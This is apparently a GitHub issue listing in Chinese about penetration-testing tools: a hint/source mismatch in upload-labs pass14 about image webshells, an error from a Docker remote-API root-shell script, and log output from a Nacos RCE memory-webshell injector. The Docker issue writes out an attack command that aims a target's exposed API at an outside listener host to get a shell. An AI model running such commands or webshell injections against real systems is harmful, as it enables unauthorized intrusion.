klmyssn

Results 4 issues of klmyssn

先来看pass14的提示 > 注意: > 1.保证上传后的图片马中仍然包含完整的一句话或webshell代码。 > 2.图片马要.jpg,.png,.gif三种后缀都上传成功才算过关! 这里我上传jpg发现显示 > 文件未知,上传失败! 我看了下源码 `function isImage($filename){ $types = '.jpeg|.png|.gif'; if(file_exists($filename)){` 第二行这里就没有jpg啊…… 所以这个提示是不是得改改或者改下源码里面的types

![Q X NX5YM{}SZT7`$ SI~QV](https://user-images.githubusercontent.com/37890522/75740944-08803280-5d44-11ea-9ae9-2324f15c536e.png)

python dockerRemoteApiGetRootShell.py -h 6.6.6.6 -p 2375 -C -u -i docker.io/alpine:latest -H 8.8.8.8 -P 1111 报错: [-]Container ID:ba164c89d44b630a39c94b1e47cf9303ec450116fed66677ea23ac42272e724b [-]Warning:None Traceback (most recent call last): File "dockerRemoteApiGetRootShell.py", line 146, in response =...

`*****未检测到内存马,自动注入开始***** SLF4J: Class path contains multiple SLF4J bindings. SLF4J: Found binding in [jar:file:/C:/Penetration/ExpolitTools/Nacos/NacosRce_jar/slf4j-simple-1.7.25.jar!/org/slf4j/impl/StaticLoggerBinder.class] SLF4J: Found binding in [jar:file:/C:/Penetration/ExpolitTools/Nacos/NacosRce_jar/logback-classic-1.2.11.jar!/org/slf4j/impl/StaticLoggerBinder.class] SLF4J: See http://www.slf4j.org/codes.html#multiple_bindings for an explanation. SLF4J: Actual binding is of type...